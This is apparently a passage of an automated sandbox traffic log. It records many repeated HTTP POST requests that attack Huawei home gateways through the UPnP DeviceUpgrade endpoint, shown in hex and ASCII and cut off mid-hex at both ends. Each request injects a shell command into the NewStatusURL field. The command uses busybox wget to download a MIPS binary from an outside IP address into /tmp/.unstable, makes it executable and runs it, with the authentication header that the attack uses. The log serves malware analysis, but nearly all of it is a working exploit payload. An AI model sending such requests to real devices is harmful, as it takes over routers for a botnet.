30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 